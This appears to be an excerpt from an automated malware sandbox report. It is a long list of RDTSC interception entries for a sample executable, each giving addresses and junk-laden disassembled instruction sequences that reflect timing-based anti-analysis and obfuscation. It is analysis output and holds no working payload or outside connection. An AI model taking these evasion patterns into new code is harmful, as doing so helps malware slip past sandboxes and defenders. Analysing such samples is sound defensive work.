                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E544 second address: 67E54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E54B second address: 67E551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E551 second address: 67E56E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F593855EEE6h 0x00000008 jns 00007F593855EEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F593855EEE6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E56E second address: 67E589 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F5938558A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5938558A9Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E6E2 second address: 67E6F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E6F8 second address: 67E705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E705 second address: 67E713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F593855EEE6h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E9CC second address: 67E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E9D0 second address: 67E9F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F593855EEECh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E9F0 second address: 67EA0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67EB83 second address: 67EB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67EB87 second address: 67EB97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F5938558A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67EB97 second address: 67EBA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F593855EEE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67ECEA second address: 67ECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68A088 second address: 68A096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F593855EEE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68A096 second address: 68A0A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68A0A0 second address: 68A0AA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F593855EEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 688A93 second address: 688AA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5938558A9Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 688AA8 second address: 688AB2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F593855EEF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 688D7E second address: 688DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5938558AA9h 0x0000000d jmp 00007F5938558AA2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6891C9 second address: 6891EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F593855EEF1h 0x0000000b popad 0x0000000c jo 00007F593855EEF2h 0x00000012 ja 00007F593855EEE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6891EF second address: 6891F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6891F3 second address: 689228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F593855EEF7h 0x0000000a jo 00007F593855EEE6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F593855EEEEh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 689391 second address: 6893A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5938558A96h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6893A0 second address: 6893A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68953A second address: 689540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68BBB4 second address: 68BBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68BBBC second address: 68BBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68BBC2 second address: 68BBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68E976 second address: 68E980 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5938558A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68E980 second address: 68E997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F593855EEECh 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68E997 second address: 68E9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68E9A5 second address: 68E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 68E9A9 second address: 68E9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 693E8E second address: 693E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 693E9B second address: 693E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 693E9F second address: 693EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 694846 second address: 69484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 699895 second address: 69989B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69989B second address: 6998BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA0h 0x00000007 pushad 0x00000008 jmp 00007F5938558A9Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656362 second address: 6563C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F593855EEE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F593855EEF8h 0x00000013 jmp 00007F593855EEF2h 0x00000018 nop 0x00000019 sub ecx, 1183FB00h 0x0000001f lea eax, dword ptr [ebp+12482070h] 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F593855EEE8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f mov ecx, 4E0DF1B6h 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6563C4 second address: 6563CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6563CA second address: 6563D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6563D0 second address: 631ACD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F5938558AA4h 0x00000012 nop 0x00000013 mov ecx, dword ptr [ebp+122D1A61h] 0x00000019 call dword ptr [ebp+124437C5h] 0x0000001f jmp 00007F5938558AA9h 0x00000024 pushad 0x00000025 push esi 0x00000026 push eax 0x00000027 pop eax 0x00000028 jno 00007F5938558A96h 0x0000002e pop esi 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 jmp 00007F5938558A9Bh 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c jp 00007F5938558A96h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65690D second address: 656912 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6569B2 second address: 6569B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656ADF second address: 656B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F593855EEF7h 0x00000008 jmp 00007F593855EEF0h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F593855EEE6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B17 second address: 656B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B1D second address: 656B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B23 second address: 656B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B77 second address: 656B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B7E second address: 656B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B8B second address: 656B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656B8F second address: 656BA1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5938558A96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656BA1 second address: 656BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F593855EEE8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 656CCE second address: 656CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 657694 second address: 632648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 pushad 0x00000008 mov dword ptr [ebp+1245669Eh], ecx 0x0000000e call 00007F593855EEF9h 0x00000013 mov dword ptr [ebp+12450D2Eh], ebx 0x00000019 pop esi 0x0000001a popad 0x0000001b call dword ptr [ebp+122D1A4Fh] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jno 00007F593855EEE6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 698DB6 second address: 698DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5938558A98h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 699206 second address: 69922E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F593855EEEFh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F593855EEEDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69BD3B second address: 69BD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69BD40 second address: 69BD6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F593855EEF3h 0x0000000a pop edi 0x0000000b jp 00007F593855EEF9h 0x00000011 jmp 00007F593855EEEDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69ECB7 second address: 69ECC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5938558A96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69ECC1 second address: 69ECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69ECC5 second address: 69ECE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F5938558AA6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E4E6 second address: 69E4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E4EA second address: 69E4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E4F3 second address: 69E4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E4F8 second address: 69E4FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E660 second address: 69E666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E7F0 second address: 69E7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E96A second address: 69E970 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E970 second address: 69E976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 69E976 second address: 69E996 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 js 00007F593855EEE6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A2370 second address: 6A2374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A2374 second address: 6A237A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A237A second address: 6A23B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5938558A9Eh 0x0000000b jmp 00007F5938558A9Eh 0x00000010 pushad 0x00000011 jng 00007F5938558A96h 0x00000017 jp 00007F5938558A96h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A23B2 second address: 6A23B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A23B7 second address: 6A23D0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5938558A9Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F5938558A96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A2764 second address: 6A2769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A2769 second address: 6A276F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A276F second address: 6A27B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F593855EF01h 0x0000000e jmp 00007F593855EEF5h 0x00000013 jc 00007F593855EEE6h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F593855EEF4h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A27B0 second address: 6A27B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A5CDD second address: 6A5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A5CE1 second address: 6A5CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A5E3D second address: 6A5E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A5E43 second address: 6A5E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A5E4A second address: 6A5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEEBh 0x00000009 jmp 00007F593855EEF6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A6244 second address: 6A625E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA0h 0x00000007 jns 00007F5938558A96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
